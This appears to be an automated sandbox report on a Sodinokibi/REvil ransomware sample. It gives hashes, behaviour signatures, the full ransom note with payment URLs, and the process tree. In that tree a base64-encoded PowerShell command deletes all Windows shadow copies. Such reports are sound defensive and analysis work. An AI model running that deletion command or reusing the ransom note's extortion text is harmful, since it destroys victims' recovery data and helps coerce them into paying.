Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    21-10-2020 12:24

General

  • Target

    24231162e8b59c46056f9a3f0a5a1033f9a91751372dc7866c72389ac941e295.exe

  • Size

    391KB

  • MD5

    c857c0ff406cc282c7fa6c0cda2487e6

  • SHA1

    1184906243d058525aadf11ed41a04036b1cbf96

  • SHA256

    24231162e8b59c46056f9a3f0a5a1033f9a91751372dc7866c72389ac941e295

  • SHA512

    886d46c46c816286d4b169eb5e2970e3711e0d0715bdfc4e3c56659ab751106eae2cd32d3ee160248305224e22a3be6b8015d0e427df22f9fff0e84ebbbdc584

Malware Config

Extracted

Path

C:\7w4k1518xa-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 7w4k1518xa. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/797E95071FE198AE 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/797E95071FE198AE Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: cL4qIMzkBUpdI4Sz80F0cJw4MJikF6nzj3ZS8/9gEJfJ67NySWdsuAoZwme2vFtu eyoJ8jSVBhSkpQSrRvHph27yO8sa/WRVAtZ+hGenmYXxWZQgfIla7zCY9AvHDuHH K7jJZ5E0Wu18zTtO7BS+0jLbuMbxeLYqMKlDSwOiaAqFSYp9KYDxBZrS6XWzvUnz ahvycgydemYnJ86dxxUM8zlitfS3YTf6g+E1LAJODHTcDuNqNN9oiGgA0RbhH7iY 4RmqIFiOn+VORgNhsIg9S4RMPdpWQpC99qrn90WdyaZPe7HOgF0i6a4a5PdsTTOO TTfFSytNasFZwRmQ5R5vUbRaWSb8JuNn5zUuNX3ApSkKZrHMaxUXSFXiKLfnR8zJ vYv9oomhXqM461ZvLdJwFDF7xTr/QMYttXx5aaH0PLby4TwYgfrYe20BDLh5IOEp qcxum2zv38gx3LmaMS0ethPIj60MODMjbJ2YFyLDrm/UqjFMhymhCCLBf4u0h4A3 R3kiAC/mfgjri/TYA0iA/7O21hxWDlfpfixvqmgCCloc7kzLaJhSP0APdySzIq3v pJ53B625/tpw21zhMi3qtZ2EWRCjACfhGkU2ZsuNM5ARF7HgpTFuxOB+mouWiH+r GeKfe5rdDe4p/UbMVrmJVb+SAWzYdgtbRSgMVX9QAxJOnzDlEo7rRbBhs0mzjotJ zW41QTkBUOoE2YFYGZM9aoWwAsUa069fitTVwAH3eu9e9erj0/WJmq50qS4TOe5g P1jsxlZzYFhJ6qXtuCiolJAQO/uRbSh9fPT8wQ61aWsZw6QlK/eZyo9HHbfaKQVc MdjWlCQkZgT8UbbL/WaQIAYyNruigNLH8n9sLW/CQEaVtC4uegTimKt2YBytN4Px BBSwmpiUCOrmBoU3oKeQGNLMwoqHRxLsTX1Ij90og0XS8VDy3yNnVl+rsipZbolI wbRM89emO+Jt0M1gN+IGnL780IYS8JuYBSxSji0G7WuSc20q0fwaidoYBHRB7H7m WtO8oiQNBeJ37phFHQ9TvHbTabssu+qMHbOypy0cz8Wn3YJQkTzS9zAu19stZ48L NHHOSxer4bK0ckgUPKkUgUjVNgk8ZiGw1xLmFknBIMeBiYvi57TmFVDlrnZ4jEe0 zOVLpxys6skrfrL71/PVPS0ALV6flPBwRp3f/hhfJzVDg+UUW8RuRqEEM3QdBMuh ApdA/IjAPThGx8/61ElV+DUCwmvxOlgWvsXqIk8qTJZ9kEm2Yblz9+PjDM5kDlG3 uHr3M09TxZ48SZsgE2S+En4FFHlrTccZ Extension name: 7w4k1518xa ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/797E95071FE198AE

http://decryptor.cc/797E95071FE198AE

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies service 2 TTPs 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\24231162e8b59c46056f9a3f0a5a1033f9a91751372dc7866c72389ac941e295.exe
    "C:\Users\Admin\AppData\Local\Temp\24231162e8b59c46056f9a3f0a5a1033f9a91751372dc7866c72389ac941e295.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1860
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2100
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:2520

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1860-0-0x0000000000000000-mapping.dmp
    • memory/1860-1-0x00007FF8C3310000-0x00007FF8C3CFC000-memory.dmp
      Filesize

      9.9MB

    • memory/1860-2-0x000001C450F70000-0x000001C450F71000-memory.dmp
      Filesize

      4KB

    • memory/1860-3-0x000001C453150000-0x000001C453151000-memory.dmp
      Filesize

      4KB